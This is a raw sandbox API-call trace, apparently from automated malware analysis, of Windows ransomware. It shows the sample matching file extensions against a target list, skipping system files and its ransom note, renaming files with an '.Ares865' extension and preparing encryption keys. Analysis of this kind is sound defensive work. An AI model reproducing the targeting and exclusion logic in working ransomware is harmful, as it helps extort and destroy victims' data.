lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0085.198] lstrlenW (lpString="adf") returned 3 [0085.198] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0085.198] lstrlenW (lpString="adn") returned 3 [0085.198] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0085.198] lstrlenW (lpString="adp") returned 3 [0085.198] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0085.198] lstrlenW (lpString="alf") returned 3 [0085.198] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0085.198] lstrlenW (lpString="ask") returned 3 [0085.198] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0085.198] lstrlenW (lpString="btr") returned 3 [0085.198] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0085.198] lstrlenW (lpString="cat") returned 3 [0085.198] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0085.198] lstrlenW (lpString="cdb") returned 3 [0085.198] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0085.198] lstrlenW (lpString="ckp") returned 3 [0085.198] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0085.198] lstrlenW (lpString="cma") returned 3 [0085.198] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0085.198] lstrlenW (lpString="cpd") returned 3 [0085.198] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0085.198] lstrlenW (lpString="dacpac") returned 6 [0085.198] lstrcmpiW (lpString1="33.bmp", lpString2="dacpac") returned -1 [0085.198] lstrlenW (lpString="dad") returned 3 [0085.198] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0085.198] lstrlenW (lpString="dadiagrams") returned 10 [0085.198] lstrcmpiW (lpString1="tile33.bmp", lpString2="dadiagrams") returned 1 [0085.198] lstrlenW (lpString="daschema") returned 8 [0085.198] lstrcmpiW (lpString1="le33.bmp", lpString2="daschema") returned 1 [0085.198] lstrlenW (lpString="db-journal") returned 10 [0085.198] lstrcmpiW (lpString1="tile33.bmp", lpString2="db-journal") returned 1 [0085.198] lstrlenW (lpString="db-shm") returned 6 [0085.199] lstrcmpiW (lpString1="33.bmp", lpString2="db-shm") returned -1 [0085.199] lstrlenW (lpString="db-wal") returned 6 [0085.199] lstrcmpiW (lpString1="33.bmp", lpString2="db-wal") returned -1 [0085.199] lstrlenW (lpString="dbc") returned 3 [0085.199] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0085.199] lstrlenW (lpString="dbs") returned 3 [0085.199] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0085.199] lstrlenW (lpString="dbt") returned 3 [0085.199] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0085.199] lstrlenW (lpString="dbv") returned 3 [0085.199] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0085.199] lstrlenW (lpString="dbx") returned 3 [0085.199] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0085.199] lstrlenW (lpString="dcb") returned 3 [0085.199] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0085.199] lstrlenW (lpString="dct") returned 3 [0085.199] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0085.199] lstrlenW (lpString="dcx") returned 3 [0085.199] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0085.199] lstrlenW (lpString="ddl") returned 3 [0085.199] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0085.199] lstrlenW (lpString="dlis") returned 4 [0085.199] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0085.199] lstrlenW (lpString="dp1") returned 3 [0085.199] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0085.199] lstrlenW (lpString="dqy") returned 3 [0085.199] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0085.199] lstrlenW (lpString="dsk") returned 3 [0085.199] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0085.199] lstrlenW (lpString="dsn") returned 3 [0085.199] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0085.199] lstrlenW (lpString="dtsx") returned 4 [0085.199] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0085.199] lstrlenW (lpString="dxl") returned 3 [0085.199] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0085.199] lstrlenW (lpString="eco") returned 3 [0085.199] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0085.200] lstrlenW (lpString="ecx") returned 3 [0085.200] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0085.200] lstrlenW (lpString="edb") returned 3 [0085.200] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0085.200] lstrlenW (lpString="epim") returned 4 [0085.200] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0085.200] lstrlenW (lpString="fcd") returned 3 [0085.200] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0085.200] lstrlenW (lpString="fdb") returned 3 [0085.200] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0085.200] lstrlenW (lpString="fic") returned 3 [0085.200] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0085.200] lstrlenW (lpString="flexolibrary") returned 12 [0085.200] lstrcmpiW (lpString1="ertile33.bmp", lpString2="flexolibrary") returned -1 [0085.200] lstrlenW (lpString="fm5") returned 3 [0085.200] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0085.200] lstrlenW (lpString="fmp") returned 3 [0085.200] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0085.200] lstrlenW (lpString="fmp12") returned 5 [0085.200] lstrcmpiW (lpString1="3.bmp", lpString2="fmp12") returned -1 [0085.200] lstrlenW (lpString="fmpsl") returned 5 [0085.200] lstrcmpiW (lpString1="3.bmp", lpString2="fmpsl") returned -1 [0085.200] lstrlenW (lpString="fol") returned 3 [0085.200] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0085.200] lstrlenW (lpString="fp3") returned 3 [0085.200] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0085.200] lstrlenW (lpString="fp4") returned 3 [0085.200] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0085.200] lstrlenW (lpString="fp5") returned 3 [0085.200] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0085.200] lstrlenW (lpString="fp7") returned 3 [0085.200] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0085.200] lstrlenW (lpString="fpt") returned 3 [0085.200] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0085.200] lstrlenW (lpString="frm") returned 3 [0085.200] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0085.200] lstrlenW (lpString="gdb") returned 3 [0085.201] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0085.201] lstrlenW (lpString="gdb") returned 3 [0085.201] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0085.201] lstrlenW (lpString="grdb") returned 4 [0085.201] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0085.201] lstrlenW (lpString="gwi") returned 3 [0085.201] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0085.201] lstrlenW (lpString="hdb") returned 3 [0085.201] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0085.201] lstrlenW (lpString="his") returned 3 [0085.201] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0085.201] lstrlenW (lpString="ib") returned 2 [0085.201] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0085.201] lstrlenW (lpString="idb") returned 3 [0085.201] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0085.201] lstrlenW (lpString="ihx") returned 3 [0085.201] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0085.201] lstrlenW (lpString="itdb") returned 4 [0085.201] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0085.201] lstrlenW (lpString="itw") returned 3 [0085.201] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0085.201] lstrlenW (lpString="jet") returned 3 [0085.201] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0085.201] lstrlenW (lpString="jtx") returned 3 [0085.201] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0085.201] lstrlenW (lpString="kdb") returned 3 [0085.201] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0085.201] lstrlenW (lpString="kexi") returned 4 [0085.201] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0085.201] lstrlenW (lpString="kexic") returned 5 [0085.201] lstrcmpiW (lpString1="3.bmp", lpString2="kexic") returned -1 [0085.201] lstrlenW (lpString="kexis") returned 5 [0085.201] lstrcmpiW (lpString1="3.bmp", lpString2="kexis") returned -1 [0085.201] lstrlenW (lpString="lgc") returned 3 [0085.201] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0085.201] lstrlenW (lpString="lwx") returned 3 [0085.201] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0085.201] lstrlenW (lpString="maf") returned 3 [0085.202] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0085.202] lstrlenW (lpString="maq") returned 3 [0085.202] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0085.202] lstrlenW (lpString="mar") returned 3 [0085.202] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0085.202] lstrlenW (lpString="marshal") returned 7 [0085.202] lstrcmpiW (lpString1="e33.bmp", lpString2="marshal") returned -1 [0085.202] lstrlenW (lpString="mas") returned 3 [0085.202] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0085.202] lstrlenW (lpString="mav") returned 3 [0085.202] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0085.202] lstrlenW (lpString="maw") returned 3 [0085.202] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0085.202] lstrlenW (lpString="mdbhtml") returned 7 [0085.202] lstrcmpiW (lpString1="e33.bmp", lpString2="mdbhtml") returned -1 [0085.202] lstrlenW (lpString="mdn") returned 3 [0085.202] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0085.202] lstrlenW (lpString="mdt") returned 3 [0085.202] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0085.202] lstrlenW (lpString="mfd") returned 3 [0085.202] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0085.202] lstrlenW (lpString="mpd") returned 3 [0085.202] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0085.202] lstrlenW (lpString="mrg") returned 3 [0085.202] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0085.202] lstrlenW (lpString="mud") returned 3 [0085.202] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0085.202] lstrlenW (lpString="mwb") returned 3 [0085.202] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0085.202] lstrlenW (lpString="myd") returned 3 [0085.202] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0085.202] lstrlenW (lpString="ndf") returned 3 [0085.202] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0085.202] lstrlenW (lpString="nnt") returned 3 [0085.202] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0085.203] lstrlenW (lpString="nrmlib") returned 6 [0085.203] lstrcmpiW (lpString1="33.bmp", lpString2="nrmlib") returned -1 [0085.203] lstrlenW (lpString="ns2") returned 3 [0085.203] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0085.203] lstrlenW (lpString="ns3") returned 3 [0085.203] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 [0085.203] lstrlenW (lpString="ns4") returned 3 [0085.203] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0085.203] lstrlenW (lpString="nsf") returned 3 [0085.203] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0085.203] lstrlenW (lpString="nv") returned 2 [0085.203] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0085.203] lstrlenW (lpString="nv2") returned 3 [0085.203] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0085.203] lstrlenW (lpString="nwdb") returned 4 [0085.203] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0085.203] lstrlenW (lpString="nyf") returned 3 [0085.203] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0085.203] lstrlenW (lpString="odb") returned 3 [0085.203] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0085.203] lstrlenW (lpString="odb") returned 3 [0085.203] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0085.203] lstrlenW (lpString="oqy") returned 3 [0085.203] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0085.203] lstrlenW (lpString="ora") returned 3 [0085.203] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0085.203] lstrlenW (lpString="orx") returned 3 [0085.203] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0085.203] lstrlenW (lpString="owc") returned 3 [0085.203] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0085.203] lstrlenW (lpString="p96") returned 3 [0085.203] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0085.203] lstrlenW (lpString="p97") returned 3 [0085.203] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0085.203] lstrlenW (lpString="pan") returned 3 [0085.203] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0085.203] lstrlenW (lpString="pdb") returned 3 [0085.204] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0085.204] lstrlenW (lpString="pdm") returned 3 [0085.204] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0085.204] lstrlenW (lpString="pnz") returned 3 [0085.204] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0085.204] lstrlenW (lpString="qry") returned 3 [0085.204] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0085.204] lstrlenW (lpString="qvd") returned 3 [0085.204] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0085.204] lstrlenW (lpString="rbf") returned 3 [0085.204] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0085.204] lstrlenW (lpString="rctd") returned 4 [0085.204] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0085.204] lstrlenW (lpString="rod") returned 3 [0085.204] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0085.204] lstrlenW (lpString="rodx") returned 4 [0085.204] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0085.204] lstrlenW (lpString="rpd") returned 3 [0085.204] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0085.204] lstrlenW (lpString="rsd") returned 3 [0085.204] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0085.204] lstrlenW (lpString="sas7bdat") returned 8 [0085.204] lstrcmpiW (lpString1="le33.bmp", lpString2="sas7bdat") returned -1 [0085.204] lstrlenW (lpString="sbf") returned 3 [0085.204] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0085.204] lstrlenW (lpString="scx") returned 3 [0085.204] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0085.204] lstrlenW (lpString="sdb") returned 3 [0085.204] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0085.204] lstrlenW (lpString="sdc") returned 3 [0085.204] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0085.204] lstrlenW (lpString="sdf") returned 3 [0085.204] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0085.204] lstrlenW (lpString="sis") returned 3 [0085.204] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0085.204] lstrlenW (lpString="spq") returned 3 [0085.204] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0085.204] lstrlenW (lpString="te") returned 2 [0085.205] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0085.205] lstrlenW (lpString="teacher") returned 7 [0085.205] lstrcmpiW (lpString1="e33.bmp", lpString2="teacher") returned -1 [0085.205] lstrlenW (lpString="tmd") returned 3 [0085.205] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0085.205] lstrlenW (lpString="tps") returned 3 [0085.205] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0085.205] lstrlenW (lpString="trc") returned 3 [0085.205] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0085.205] lstrlenW (lpString="trc") returned 3 [0085.205] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0085.205] lstrlenW (lpString="trm") returned 3 [0085.205] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0085.205] lstrlenW (lpString="udb") returned 3 [0085.205] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0085.205] lstrlenW (lpString="udl") returned 3 [0085.205] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0085.205] lstrlenW (lpString="usr") returned 3 [0085.205] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0085.205] lstrlenW (lpString="v12") returned 3 [0085.205] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0085.205] lstrlenW (lpString="vis") returned 3 [0085.205] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0085.205] lstrlenW (lpString="vpd") returned 3 [0085.205] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0085.205] lstrlenW (lpString="vvv") returned 3 [0085.205] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0085.205] lstrlenW (lpString="wdb") returned 3 [0085.205] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0085.205] lstrlenW (lpString="wmdb") returned 4 [0085.205] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0085.205] lstrlenW (lpString="wrk") returned 3 [0085.205] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0085.205] lstrlenW (lpString="xdb") returned 3 [0085.205] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0085.205] lstrlenW (lpString="xld") returned 3 [0085.205] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0085.206] lstrlenW (lpString="xmlff") returned 5 [0085.206] lstrcmpiW (lpString1="3.bmp", lpString2="xmlff") returned -1 [0085.206] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp.Ares865") returned 90 [0085.206] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile33.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile33.bmp.ares865"), dwFlags=0x1) returned 1 [0085.206] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile33.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0085.207] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0085.207] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0085.207] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0085.207] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0085.207] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0085.208] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0085.208] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.208] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0085.209] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0085.213] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0085.214] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0085.214] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.214] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0085.214] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0085.214] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0085.214] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0085.214] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0085.214] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0085.214] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0085.215] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0085.215] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0085.215] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0085.215] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0085.215] CloseHandle (hObject=0x15c) returned 1 [0085.215] CloseHandle (hObject=0x118) returned 1 [0085.215] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0085.215] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0085.215] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0085.216] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4fccfe, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae4fccfe, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd9c9561, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile34.bmp", cAlternateFileName="")) returned 1 [0085.216] lstrcmpiW (lpString1="usertile34.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0085.216] lstrcmpiW (lpString1="usertile34.bmp", lpString2="aoldtz.exe") returned 1 [0085.216] lstrcmpiW (lpString1="usertile34.bmp", lpString2=".") returned 1 [0085.216] lstrcmpiW (lpString1="usertile34.bmp", lpString2="..") returned 1 [0085.216] lstrcmpiW (lpString1="usertile34.bmp", lpString2="windows") returned -1 [0085.216] lstrcmpiW (lpString1="usertile34.bmp", lpString2="bootmgr") returned 1 [0085.216] lstrcmpiW (lpString1="usertile34.bmp", lpString2="temp") returned 1 [0085.216] lstrcmpiW (lpString1="usertile34.bmp", lpString2="pagefile.sys") returned 1 [0085.216] lstrcmpiW (lpString1="usertile34.bmp", lpString2="boot") returned 1 [0085.216] lstrcmpiW (lpString1="usertile34.bmp", lpString2="ids.txt") returned 1 [0085.216] lstrcmpiW (lpString1="usertile34.bmp", lpString2="ntuser.dat") returned 1 [0085.216] lstrcmpiW (lpString1="usertile34.bmp", lpString2="perflogs") returned 1 [0085.216] lstrcmpiW (lpString1="usertile34.bmp", lpString2="MSBuild") returned 1 [0085.216] lstrlenW (lpString="usertile34.bmp") returned 14 [0085.216] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp") returned 82 [0085.216] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile34.bmp" | out: lpString1="usertile34.bmp") returned="usertile34.bmp" [0085.216] lstrlenW (lpString="usertile34.bmp") returned 14 [0085.216] lstrlenW (lpString="Ares865") returned 7 [0085.216] lstrcmpiW (lpString1="e34.bmp", lpString2="Ares865") returned 1 [0085.216] lstrlenW (lpString=".dll") returned 4 [0085.216] lstrcmpiW (lpString1="usertile34.bmp", lpString2=".dll") returned 1 [0085.216] lstrlenW (lpString=".lnk") returned 4 [0085.216] lstrcmpiW (lpString1="usertile34.bmp", lpString2=".lnk") returned 1 [0085.216] lstrlenW (lpString=".ini") returned 4 [0085.216] lstrcmpiW (lpString1="usertile34.bmp", lpString2=".ini") returned 1 [0085.216] lstrlenW (lpString=".sys") returned 4 [0085.216] lstrcmpiW (lpString1="usertile34.bmp", lpString2=".sys") returned 1 [0085.217] lstrlenW (lpString="usertile34.bmp") returned 14 [0085.217] lstrlenW (lpString="bak") returned 3 [0085.217] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0085.217] lstrlenW (lpString="ba_") returned 3 [0085.217] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0085.217] lstrlenW (lpString="dbb") returned 3 [0085.217] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0085.217] lstrlenW (lpString="vmdk") returned 4 [0085.217] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0085.217] lstrlenW (lpString="rar") returned 3 [0085.217] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0085.217] lstrlenW (lpString="zip") returned 3 [0085.217] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0085.217] lstrlenW (lpString="tgz") returned 3 [0085.217] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0085.217] lstrlenW (lpString="vbox") returned 4 [0085.217] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0085.217] lstrlenW (lpString="vdi") returned 3 [0085.217] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0085.217] lstrlenW (lpString="vhd") returned 3 [0085.217] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0085.217] lstrlenW (lpString="vhdx") returned 4 [0085.217] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0085.217] lstrlenW (lpString="avhd") returned 4 [0085.217] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0085.217] lstrlenW (lpString="db") returned 2 [0085.217] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0085.217] lstrlenW (lpString="db2") returned 3 [0085.217] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0085.217] lstrlenW (lpString="db3") returned 3 [0085.217] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0085.217] lstrlenW (lpString="dbf") returned 3 [0085.217] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0085.217] lstrlenW (lpString="mdf") returned 3 [0085.217] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0085.217] lstrlenW (lpString="mdb") returned 3 [0085.217] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0085.218] lstrlenW (lpString="sql") returned 3 [0085.218] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0085.218] lstrlenW (lpString="sqlite") returned 6 [0085.218] lstrcmpiW (lpString1="34.bmp", lpString2="sqlite") returned -1 [0085.218] lstrlenW (lpString="sqlite3") returned 7 [0085.218] lstrcmpiW (lpString1="e34.bmp", lpString2="sqlite3") returned -1 [0085.218] lstrlenW (lpString="sqlitedb") returned 8 [0085.218] lstrcmpiW (lpString1="le34.bmp", lpString2="sqlitedb") returned -1 [0085.218] lstrlenW (lpString="xml") returned 3 [0085.218] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0085.218] lstrlenW (lpString="$er") returned 3 [0085.218] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0085.218] lstrlenW (lpString="4dd") returned 3 [0085.218] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0085.218] lstrlenW (lpString="4dl") returned 3 [0085.218] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0085.218] lstrlenW (lpString="^^^") returned 3 [0085.218] lstrcmpiW (lpString1="bmp", 